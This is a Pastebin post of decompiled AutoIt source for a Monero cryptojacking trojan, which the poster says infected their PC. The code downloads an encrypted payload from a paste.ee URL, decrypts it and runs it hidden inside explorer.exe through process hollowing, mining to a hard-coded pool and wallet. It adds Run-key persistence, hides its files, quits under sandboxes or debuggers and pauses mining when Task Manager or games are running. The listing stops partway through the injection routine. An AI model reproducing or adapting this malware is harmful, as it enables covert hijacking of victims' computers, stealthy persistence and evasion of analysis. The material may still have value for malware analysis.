API tools faq
paste
KekSec

xmr mining malware source code (that my pc was infected with)

KekSec
Aug 2nd, 2020
998
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 23.18 KB | None | 0 0
raw download clone embed print report
  1. #NoTrayIcon
  2. #Region
  3. #AutoIt3Wrapper_Compression=4
  4. #AutoIt3Wrapper_UseUpx=y
  5. #EndRegion
  6. FUNC _3(CONST $0=@ERROR,CONST $1=@EXTENDED)
  7. LOCAL $2=DLLCALL("kernel32.dll","dword","GetLastError")
  8. RETURN SETERROR($0,$1,$2[0])
  9. ENDFUNC
  10. GLOBAL CONST $3="struct;long Left;long Top;long Right;long Bottom;endstruct"
  11. GLOBAL CONST $4="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"&((@OSVERSION="WIN_XP")""";"&$3&";uint uChevronState")
  12. GLOBAL CONST $5="dword Length;ptr Descriptor;bool InheritHandle"
  13. GLOBAL CONST $6="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
  14. GLOBAL CONST $7=_1V()
  15. FUNC _1V()
  16. LOCAL $8=DLLSTRUCTCREATE($6)
  17. DLLSTRUCTSETDATA($8,1,DLLSTRUCTGETSIZE($8))
  18. LOCAL $9=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$8)
  19. IF @ERROR OR NOT $9[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  20. RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($8,2),-8),DLLSTRUCTGETDATA($8,3))
  21. ENDFUNC
  22. FUNC _53($A,$B=TRUE )
  23. LOCAL $C=INETREAD($A,1)
  24. LOCAL $D=@ERROR,$E=@EXTENDED
  25. IF $B=DEFAULT OR $B THEN $C=BINARYTOSTRING($C)
  26. RETURN SETERROR($D,$E,$C)
  27. ENDFUNC
  28. GLOBAL CONST $F=-268435456
  29. GLOBAL $G[3]
  30. FUNC _5A()
  31. IF _5L()=0 THEN
  32. LOCAL $H=DLLOPEN("Advapi32.dll")
  33. IF $H=-1 THEN RETURN SETERROR(1001,0,FALSE )
  34. _5P($H)
  35. LOCAL $I=24
  36. LOCAL $9=DLLCALL(_5O(),"bool","CryptAcquireContext","handle*",0,"ptr",0,"ptr",0,"dword",$I,"dword",$F)
  37. IF @ERROR OR NOT $9[0]THEN
  38. LOCAL $D=@ERROR+1002,$E=@EXTENDED
  39. IF NOT $9[0]THEN $E=_3()
  40. DLLCLOSE(_5O())
  41. RETURN SETERROR($D,$E,FALSE )
  42. ELSE
  43. _5R($9[1])
  44. ENDIF
  45. ENDIF
  46. _5M()
  47. RETURN TRUE
  48. ENDFUNC
  49. FUNC _5B()
  50. _5N()
  51. IF _5L()=0 THEN
  52. DLLCALL(_5O(),"bool","CryptReleaseContext","handle",_5Q(),"dword",0)
  53. DLLCLOSE(_5O())
  54. ENDIF
  55. ENDFUNC
  56. FUNC _5C($J,$K,$L=32771)
  57. LOCAL $9=0,$M=0,$N=0,$D=0,$E=0,$O=0
  58. _5A()
  59. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  60. DO
  61. $9=DLLCALL(_5O(),"bool","CryptCreateHash","handle",_5Q(),"uint",$L,"ptr",0,"dword",0,"handle*",0)
  62. IF @ERROR OR NOT $9[0]THEN
  63. $D=@ERROR+10
  64. $E=@EXTENDED
  65. IF NOT $9[0]THEN $E=_3()
  66. $O=-1
  67. EXITLOOP
  68. ENDIF
  69. $N=$9[5]
  70. $M=DLLSTRUCTCREATE("byte["&BINARYLEN($J)&"]")
  71. DLLSTRUCTSETDATA($M,1,$J)
  72. $9=DLLCALL(_5O(),"bool","CryptHashData","handle",$N,"struct*",$M,"dword",DLLSTRUCTGETSIZE($M),"dword",1)
  73. IF @ERROR OR NOT $9[0]THEN
  74. $D=@ERROR+20
  75. $E=@EXTENDED
  76. IF NOT $9[0]THEN $E=_3()
  77. $O=-1
  78. EXITLOOP
  79. ENDIF
  80. $9=DLLCALL(_5O(),"bool","CryptDeriveKey","handle",_5Q(),"uint",$K,"handle",$N,"dword",1,"handle*",0)
  81. IF @ERROR OR NOT $9[0]THEN
  82. $D=@ERROR+30
  83. $E=@EXTENDED
  84. IF NOT $9[0]THEN $E=_3()
  85. $O=-1
  86. EXITLOOP
  87. ENDIF
  88. $O=$9[5]
  89. UNTIL TRUE
  90. IF $N<>0 THEN DLLCALL(_5O(),"bool","CryptDestroyHash","handle",$N)
  91. RETURN SETERROR($D,$E,$O)
  92. ENDFUNC
  93. FUNC _5D($P)
  94. LOCAL $9=DLLCALL(_5O(),"bool","CryptDestroyKey","handle",$P)
  95. LOCAL $D=@ERROR,$E=@EXTENDED
  96. IF NOT $9[0]THEN $E=_3()
  97. _5B()
  98. IF $D OR NOT $9[0]THEN
  99. RETURN SETERROR($D+10,$E,FALSE )
  100. ELSE
  101. RETURN TRUE
  102. ENDIF
  103. ENDFUNC
  104. FUNC _5F($Q,$R,$K,$S=TRUE )
  105. SWITCH $K
  106. CASE 0
  107. LOCAL $T=_5S($R)
  108. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  109. IF $T=26625 THEN CONTINUECASE
  110. CASE 26625
  111. IF BINARYLEN($Q)=0 THEN RETURN SETERROR(0,0,BINARY(""))
  112. ENDSWITCH
  113. LOCAL $9=0,$M=0,$U=0,$D=0,$E=0,$V=0,$O=0
  114. _5A()
  115. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  116. DO
  117. IF $K<>0 THEN
  118. $R=_5C($R,$K)
  119. IF @ERROR THEN
  120. $D=@ERROR
  121. $E=@EXTENDED
  122. $O=-1
  123. EXITLOOP
  124. ENDIF
  125. ENDIF
  126. $M=DLLSTRUCTCREATE("byte["&BINARYLEN($Q)+1000&"]")
  127. IF BINARYLEN($Q)>0 THEN DLLSTRUCTSETDATA($M,1,$Q)
  128. $9=DLLCALL(_5O(),"bool","CryptDecrypt","handle",$R,"handle",0,"bool",$S,"dword",0,"struct*",$M,"dword*",BINARYLEN($Q))
  129. IF @ERROR OR NOT $9[0]THEN
  130. $D=@ERROR+70
  131. $E=@EXTENDED
  132. IF NOT $9[0]THEN $E=_3()
  133. $O=-1
  134. EXITLOOP
  135. ENDIF
  136. $V=$9[6]
  137. $U=DLLSTRUCTCREATE("byte["&$V+1&"]",DLLSTRUCTGETPTR($M))
  138. $O=BINARYMID(DLLSTRUCTGETDATA($U,1),1,$V)
  139. UNTIL TRUE
  140. IF $K<>0 THEN _5D($R)
  141. _5B()
  142. RETURN SETERROR($D,$E,$O)
  143. ENDFUNC
  144. FUNC _5L()
  145. RETURN $G[0]
  146. ENDFUNC
  147. FUNC _5M()
  148. $G[0]+=1
  149. ENDFUNC
  150. FUNC _5N()
  151. IF $G[0]>0 THEN $G[0]-=1
  152. ENDFUNC
  153. FUNC _5O()
  154. RETURN $G[1]
  155. ENDFUNC
  156. FUNC _5P($H)
  157. $G[1]=$H
  158. ENDFUNC
  159. FUNC _5Q()
  160. RETURN $G[2]
  161. ENDFUNC
  162. FUNC _5R($W)
  163. $G[2]=$W
  164. ENDFUNC
  165. FUNC _5S($R)
  166. LOCAL $X=DLLSTRUCTCREATE("uint")
  167. LOCAL $9=DLLCALL(_5O(),"bool","CryptGetKeyParam","handle",$R,"dword",7,"struct*",$X,"dword*",DLLSTRUCTGETSIZE($X),"dword",0)
  168. LOCAL $D=@ERROR,$E=@EXTENDED
  169. IF NOT $9[0]THEN $E=_3()
  170. IF $D OR NOT $9[0]THEN
  171. RETURN SETERROR($D+80,$E,1)
  172. ELSE
  173. RETURN DLLSTRUCTGETDATA($X,1)
  174. ENDIF
  175. ENDFUNC
  176. FUNC _5U()
  177. LOCAL $Y=DLLSTRUCTCREATE("uint;dword")
  178. DLLSTRUCTSETDATA($Y,1,DLLSTRUCTGETSIZE($Y))
  179. LOCAL $2=DLLCALL("user32.dll","bool","GetLastInputInfo","struct*",$Y)
  180. IF @ERROR OR $2[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  181. LOCAL $0Z=DLLCALL("kernel32.dll","dword","GetTickCount")
  182. IF @ERROR OR NOT $2[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  183. LOCAL $10=$0Z[0]-DLLSTRUCTGETDATA($Y,2)
  184. IF $10<0 THEN RETURN SETEXTENDED(1,$0Z[0])
  185. RETURN $10
  186. ENDFUNC
  187. FUNC _66($11,$12=0)
  188. LOCAL CONST $13=183
  189. LOCAL CONST $14=1
  190. LOCAL $15=0
  191. IF BITAND($12,2)THEN
  192. LOCAL $16=DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
  193. LOCAL $9=DLLCALL("advapi32.dll","bool","InitializeSecurityDescriptor","struct*",$16,"dword",$14)
  194. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  195. IF $9[0]THEN
  196. $9=DLLCALL("advapi32.dll","bool","SetSecurityDescriptorDacl","struct*",$16,"bool",1,"ptr",0,"bool",0)
  197. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  198. IF $9[0]THEN
  199. $15=DLLSTRUCTCREATE($5)
  200. DLLSTRUCTSETDATA($15,1,DLLSTRUCTGETSIZE($15))
  201. DLLSTRUCTSETDATA($15,2,DLLSTRUCTGETPTR($16))
  202. DLLSTRUCTSETDATA($15,3,0)
  203. ENDIF
  204. ENDIF
  205. ENDIF
  206. LOCAL $17=DLLCALL("kernel32.dll","handle","CreateMutexW","struct*",$15,"bool",1,"wstr",$11)
  207. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  208. LOCAL $18=DLLCALL("kernel32.dll","dword","GetLastError")
  209. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  210. IF $18[0]=$13 THEN
  211. IF BITAND($12,1)THEN
  212. DLLCALL("kernel32.dll","bool","CloseHandle","handle",$17[0])
  213. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  214. RETURN SETERROR($18[0],$18[0],0)
  215. ELSE
  216. EXIT -1
  217. ENDIF
  218. ENDIF
  219. RETURN $17[0]
  220. ENDFUNC
  221. _66("ixhost",1)
  222. $19="UpdateScheduler"
  223. GLOBAL $1A
  224. IF @OSARCH="X86" THEN
  225. $1A=@WINDOWSDIR&"\explorer.exe"
  226. ELSE
  227. $1A=@SYSTEMDIR&"\explorer.exe"
  228. ENDIF
  229. $1B="C:\Windows\System32\svchost.exe"
  230. $1C="pool.supportxmr.com:3333"
  231. $1D="42yzCwXHqAr2cbZ6kWU8SZJCq5H3quBAkgDd6ZZGKvvRYaPxKJ8J6GMVhGjo8pmgy74NRTvVst2ZGAk35ERgAS88NFHQQAV"
  232. $1E="-o "&$1C&" -u "&$1D&" -p x -k -t 1 --nicehash"
  233. $1F="-o "&$1C&" -u "&$1D&" -p x -k --max-cpu-usage=100 --nicehash"
  234. IF _66("ixkiller",1)=0 THEN
  235. IF PROCESSEXISTS(@SCRIPTNAME)THEN
  236. PROCESSCLOSE(@SCRIPTNAME)
  237. ENDIF
  238. ENDIF
  239. $1G=_53("https://paste.ee/r/LG8VC/0")
  240. $1H=_5F($1G,"ix32",26128)
  241. $1I=""
  242. _6E(1000)
  243. WHILE 1
  244. GUIGETMSG()
  245. _6F()
  246. _6D($19)
  247. _6C()
  248. WEND
  249. FUNC _6C()
  250. IF PROCESSEXISTS("SbieCtrl.exe")OR WINGETTEXT("Sanboxie Control")OR WINGETTEXT("PEiD")OR WINGETTEXT("ollydbg")OR WINGETTEXT("exetoaut")OR WINGETTEXT("myAutToExe")OR WINGETTEXT("Program Manager")THEN
  251. EXIT
  252. ENDIF
  253. ENDFUNC
  254. FUNC _6D($19)
  255. IF ISADMIN()=1 THEN
  256. IF FILEEXISTS(@WINDOWSDIR&"\"&@SCRIPTNAME)=FALSE THEN
  257. FILECOPY(@SCRIPTFULLPATH,@WINDOWSDIR&"\"&@SCRIPTNAME)
  258. ENDIF
  259. IF REGREAD("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
  260. REGWRITE("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@WINDOWSDIR&"\"&@SCRIPTNAME)
  261. ENDIF
  262. ELSE
  263. IF FILEEXISTS(@STARTUPDIR&"\"&@SCRIPTNAME)=FALSE THEN
  264. FILECOPY(@SCRIPTFULLPATH,@STARTUPDIR&"\"&@SCRIPTNAME)
  265. FILECOPY(@SCRIPTFULLPATH,@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
  266. ENDIF
  267. IF REGREAD("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
  268. REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@STARTUPDIR&"\"&@SCRIPTNAME)
  269. REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
  270. FILESETATTRIB(@STARTUPDIR&"\"&@SCRIPTNAME,"+SH")
  271. FILESETATTRIB(@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME,"+SH")
  272. REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1)
  273. REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
  274. ENDIF
  275. ENDIF
  276. ENDFUNC
  277. FUNC _6E($1J)
  278. LOCAL $1K=DLLCALL("kernel32.dll","dword","GetTickCount")
  279. SLEEP($1J)
  280. LOCAL $1L=DLLCALL("kernel32.dll","dword","GetTickCount")
  281. IF $1L[0]-$1K[0]=$1J THEN
  282. RETURN FALSE
  283. ELSE
  284. RETURN TRUE
  285. ENDIF
  286. ENDFUNC
  287. FUNC _6F()
  288. $1M=_5U()
  289. IF PROCESSEXISTS("Taskmgr.exe")OR PROCESSEXISTS("procexp.exe")OR PROCESSEXISTS("procexp64.exe")OR PROCESSEXISTS("procmon.exe")OR PROCESSEXISTS("FortniteClient-Win64-Shipping.exe")OR PROCESSEXISTS("bf1.exe")OR PROCESSEXISTS("bf4.exe")OR PROCESSEXISTS("bf4_x86.exe")OR PROCESSEXISTS("NFS16.exe")OR PROCESSEXISTS("NFS16_trial.exe")OR PROCESSEXISTS("Overwatch.exe")OR PROCESSEXISTS("csgo.exe")OR PROCESSEXISTS("argo.exe")OR PROCESSEXISTS("dota2.exe")OR PROCESSEXISTS("rust.exe")OR PROCESSEXISTS("argo_x64.exe")OR PROCESSEXISTS("arma3.exe")OR PROCESSEXISTS("arma3_x64.exe")OR PROCESSEXISTS("Creativerse.exe")OR PROCESSEXISTS("hl2.exe")OR PROCESSEXISTS("GTA5.exe")OR PROCESSEXISTS("insurgency.exe")OR PROCESSEXISTS("insurgency_64.exe")OR PROCESSEXISTS("paladins.exe")OR PROCESSEXISTS("TslGame.exe")OR PROCESSEXISTS("Unturned.exe")OR WINEXISTS("FIFA")THEN
  290. WINKILL($1A)
  291. SLEEP(10)
  292. ELSE
  293. IF $1M>50000 THEN
  294. IF NOT PROCESSEXISTS("madHcCtrl.exe")AND NOT PROCESSEXISTS("Sling.exe")THEN
  295. IF $1I="low" THEN
  296. WINKILL($1A)
  297. _6G($1H,$1F,$1A)
  298. SLEEP(5000)
  299. $1I="high"
  300. ELSEIF $1I="" THEN
  301. _6G($1H,$1F,$1A)
  302. SLEEP(5000)
  303. $1I="high"
  304. ENDIF
  305. ELSEIF $1I="high" THEN
  306. _6G($1H,$1E,$1A)
  307. SLEEP(5000)
  308. $1I="low"
  309. ELSEIF $1I="" THEN
  310. _6G($1H,$1E,$1A)
  311. SLEEP(5000)
  312. $1I="low"
  313. ENDIF
  314. ELSEIF $1I="high" THEN
  315. WINKILL($1A)
  316. _6G($1H,$1E,$1A)
  317. SLEEP(5000)
  318. $1I="low"
  319. ELSEIF $1I="" THEN
  320. _6G($1H,$1E,$1A)
  321. SLEEP(5000)
  322. $1I="low"
  323. ELSEIF NOT WINEXISTS($1A)THEN
  324. _6G($1H,$1E,$1A)
  325. SLEEP(3000)
  326. ENDIF
  327. ENDIF
  328. ENDFUNC
  329. FUNC _6G($1N,$1O=0,$1P=0)
  330. LOCAL $1Q=@AUTOITX64
  331. LOCAL $1R=BINARY($1N)
  332. LOCAL $1S=DLLSTRUCTCREATE("byte["&BINARYLEN($1R)&"]")
  333. DLLSTRUCTSETDATA($1S,1,$1R)
  334. LOCAL $1T=DLLSTRUCTGETPTR($1S)
  335. LOCAL $1U=DLLSTRUCTCREATE("dword  cbSize;"&"ptr Reserved;"&"ptr Desktop;"&"ptr Title;"&"dword X;"&"dword Y;"&"dword XSize;"&"dword YSize;"&"dword XCountChars;"&"dword YCountChars;"&"dword FillAttribute;"&"dword Flags;"&"word ShowWindow;"&"word Reserved2;"&"ptr Reserved2;"&"ptr hStdInput;"&"ptr hStdOutput;"&"ptr hStdError")
  336. DLLSTRUCTSETDATA($1U,"Flags",1)
  337. DLLSTRUCTSETDATA($1U,"ShowWindow",@SW_HIDE)
  338. LOCAL $1V=DLLSTRUCTCREATE("ptr Process;"&"ptr Thread;"&"dword ProcessId;"&"dword ThreadId")
  339. IF $1O THEN $1O=$1P&" "&$1O
  340. LOCAL $1W=DLLCALL("kernel32.dll","bool","CreateProcessW","wstr",$1P,"wstr",$1O,"ptr",0,"ptr",0,"int",0,"dword",4,"ptr",0,"ptr",0,"ptr",DLLSTRUCTGETPTR($1U),"ptr",DLLSTRUCTGETPTR($1V))
  341. IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
  342. LOCAL $1X=DLLSTRUCTGETDATA($1V,"Process")
  343. LOCAL $1Y=DLLSTRUCTGETDATA($1V,"Thread")
  344. IF $1Q AND _6M($1X)THEN
  345. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  346. RETURN SETERROR(2,0,0)
  347. ENDIF
  348. LOCAL $1Z,$20
  349. IF $1Q THEN
  350. IF @OSARCH="X64" THEN
  351. $1Z=2
  352. $20=DLLSTRUCTCREATE("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;"&"dword ContextFlags; dword MxCsr;"&"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;"&"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;"&"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;"&"uint64 Rip;"&"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];"&"uint64 VectorRegister[52]; uint64 VectorControl;"&"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
  353. ELSE
  354. $1Z=3
  355. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  356. RETURN SETERROR(102,0,0)
  357. ENDIF
  358. ELSE
  359. $1Z=1
  360. $20=DLLSTRUCTCREATE("dword ContextFlags;"&"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;"&"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;"&"dword SegGs; dword SegFs; dword SegEs; dword SegDs;"&"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;"&"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;"&"byte ExtendedRegisters[512]")
  361. ENDIF
  362. LOCAL $21
  363. SWITCH $1Z
  364. CASE 1
  365. $21=65543
  366. CASE 2
  367. $21=1048583
  368. CASE 3
  369. $21=524327
  370. ENDSWITCH
  371. DLLSTRUCTSETDATA($20,"ContextFlags",$21)
  372. $1W=DLLCALL("kernel32.dll","bool","GetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
  373. IF @ERROR OR NOT $1W[0]THEN
  374. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  375. RETURN SETERROR(3,0,0)
  376. ENDIF
  377. LOCAL $22
  378. SWITCH $1Z
  379. CASE 1
  380. $22=DLLSTRUCTGETDATA($20,"Ebx")
  381. CASE 2
  382. $22=DLLSTRUCTGETDATA($20,"Rdx")
  383. CASE 3
  384. ENDSWITCH
  385. LOCAL $23=DLLSTRUCTCREATE("char Magic[2];"&"word BytesOnLastPage;"&"word Pages;"&"word Relocations;"&"word SizeofHeader;"&"word MinimumExtra;"&"word MaximumExtra;"&"word SS;"&"word SP;"&"word Checksum;"&"word IP;"&"word CS;"&"word Relocation;"&"word Overlay;"&"char Reserved[8];"&"word OEMIdentifier;"&"word OEMInformation;"&"char Reserved2[20];"&"dword AddressOfNewExeHeader",$1T)
  386. LOCAL $24=$1T
  387. $1T+=DLLSTRUCTGETDATA($23,"AddressOfNewExeHeader")
  388. LOCAL $25=DLLSTRUCTGETDATA($23,"Magic")
  389. IF NOT ($25=="MZ")THEN
  390. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  391. RETURN SETERROR(4,0,0)
  392. ENDIF
  393. LOCAL $26=DLLSTRUCTCREATE("dword Signature",$1T)
  394. $1T+=4
  395. IF DLLSTRUCTGETDATA($26,"Signature")<>17744 THEN
  396. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  397. RETURN SETERROR(5,0,0)
  398. ENDIF
  399. LOCAL $27=DLLSTRUCTCREATE("word Machine;"&"word NumberOfSections;"&"dword TimeDateStamp;"&"dword PointerToSymbolTable;"&"dword NumberOfSymbols;"&"word SizeOfOptionalHeader;"&"word Characteristics",$1T)
  400. LOCAL $28=DLLSTRUCTGETDATA($27,"NumberOfSections")
  401. $1T+=20
  402. LOCAL $29=DLLSTRUCTCREATE("word Magic;",$1T)
  403. LOCAL $2A=DLLSTRUCTGETDATA($29,1)
  404. LOCAL $2B
  405. IF $2A=267 THEN
  406. IF $1Q THEN
  407. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  408. RETURN SETERROR(6,0,0)
  409. ENDIF
  410. $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"dword BaseOfData;"&"dword ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"dword SizeOfStackReserve;"&"dword SizeOfStackCommit;"&"dword SizeOfHeapReserve;"&"dword SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
  411. $1T+=96
  412. ELSEIF $2A=523 THEN
  413. IF NOT $1Q THEN
  414. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  415. RETURN SETERROR(6,0,0)
  416. ENDIF
  417. $2B=DLLSTRUCTCREATE("word Magic;"&"byte MajorLinkerVersion;"&"byte MinorLinkerVersion;"&"dword SizeOfCode;"&"dword SizeOfInitializedData;"&"dword SizeOfUninitializedData;"&"dword AddressOfEntryPoint;"&"dword BaseOfCode;"&"uint64 ImageBase;"&"dword SectionAlignment;"&"dword FileAlignment;"&"word MajorOperatingSystemVersion;"&"word MinorOperatingSystemVersion;"&"word MajorImageVersion;"&"word MinorImageVersion;"&"word MajorSubsystemVersion;"&"word MinorSubsystemVersion;"&"dword Win32VersionValue;"&"dword SizeOfImage;"&"dword SizeOfHeaders;"&"dword CheckSum;"&"word Subsystem;"&"word DllCharacteristics;"&"uint64 SizeOfStackReserve;"&"uint64 SizeOfStackCommit;"&"uint64 SizeOfHeapReserve;"&"uint64 SizeOfHeapCommit;"&"dword LoaderFlags;"&"dword NumberOfRvaAndSizes",$1T)
  418. $1T+=112
  419. ELSE
  420. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  421. RETURN SETERROR(6,0,0)
  422. ENDIF
  423. LOCAL $2C=DLLSTRUCTGETDATA($2B,"AddressOfEntryPoint")
  424. LOCAL $2D=DLLSTRUCTGETDATA($2B,"SizeOfHeaders")
  425. LOCAL $2E=DLLSTRUCTGETDATA($2B,"ImageBase")
  426. LOCAL $2F=DLLSTRUCTGETDATA($2B,"SizeOfImage")
  427. $1T+=8
  428. $1T+=8
  429. $1T+=24
  430. LOCAL $2G=DLLSTRUCTCREATE("dword VirtualAddress; dword Size",$1T)
  431. LOCAL $2H=DLLSTRUCTGETDATA($2G,"VirtualAddress")
  432. LOCAL $2I=DLLSTRUCTGETDATA($2G,"Size")
  433. LOCAL $2J
  434. IF $2H AND $2I THEN $2J=TRUE
  435. IF NOT $2J THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!"&@CRLF)
  436. $1T+=88
  437. LOCAL $2K
  438. LOCAL $2L
  439. IF $2J THEN
  440. $2L=_6K($1X,$2F)
  441. IF @ERROR THEN
  442. $2L=_6J($1X,$2E,$2F)
  443. IF @ERROR THEN
  444. _6L($1X,$2E)
  445. $2L=_6J($1X,$2E,$2F)
  446. IF @ERROR THEN
  447. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  448. RETURN SETERROR(101,1,0)
  449. ENDIF
  450. ENDIF
  451. ENDIF
  452. $2K=TRUE
  453. ELSE
  454. $2L=_6J($1X,$2E,$2F)
  455. IF @ERROR THEN
  456. _6L($1X,$2E)
  457. $2L=_6J($1X,$2E,$2F)
  458. IF @ERROR THEN
  459. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  460. RETURN SETERROR(101,0,0)
  461. ENDIF
  462. ENDIF
  463. ENDIF
  464. DLLSTRUCTSETDATA($2B,"ImageBase",$2L)
  465. LOCAL $2M=DLLSTRUCTCREATE("byte["&$2F&"]")
  466. LOCAL $2N=DLLSTRUCTGETPTR($2M)
  467. LOCAL $2O=DLLSTRUCTCREATE("byte["&$2D&"]",$24)
  468. DLLSTRUCTSETDATA($2M,1,DLLSTRUCTGETDATA($2O,1))
  469. LOCAL $2P
  470. LOCAL $2Q,$2R
  471. LOCAL $2S,$2T
  472. LOCAL $2U
  473. FOR $2V=1 TO $28
  474. $2P=DLLSTRUCTCREATE("char Name[8];"&"dword UnionOfVirtualSizeAndPhysicalAddress;"&"dword VirtualAddress;"&"dword SizeOfRawData;"&"dword PointerToRawData;"&"dword PointerToRelocations;"&"dword PointerToLinenumbers;"&"word NumberOfRelocations;"&"word NumberOfLinenumbers;"&"dword Characteristics",$1T)
  475. $2Q=DLLSTRUCTGETDATA($2P,"SizeOfRawData")
  476. $2R=$24+DLLSTRUCTGETDATA($2P,"PointerToRawData")
  477. $2S=DLLSTRUCTGETDATA($2P,"VirtualAddress")
  478. $2T=DLLSTRUCTGETDATA($2P,"UnionOfVirtualSizeAndPhysicalAddress")
  479. IF $2T AND $2T<$2Q THEN $2Q=$2T
  480. IF $2Q THEN
  481. DLLSTRUCTSETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2N+$2S),1,DLLSTRUCTGETDATA(DLLSTRUCTCREATE("byte["&$2Q&"]",$2R),1))
  482. ENDIF
  483. IF $2K THEN
  484. IF $2S<=$2H AND $2S+$2Q>$2H THEN
  485. $2U=DLLSTRUCTCREATE("byte["&$2I&"]",$2R+($2H-$2S))
  486. ENDIF
  487. ENDIF
  488. $1T+=40
  489. NEXT
  490. IF $2K THEN _6I($2N,$2U,$2L,$2E,$2A=523)
  491. $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$2L,"ptr",$2N,"dword_ptr",$2F,"dword_ptr*",0)
  492. IF @ERROR OR NOT $1W[0]THEN
  493. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  494. RETURN SETERROR(7,0,0)
  495. ENDIF
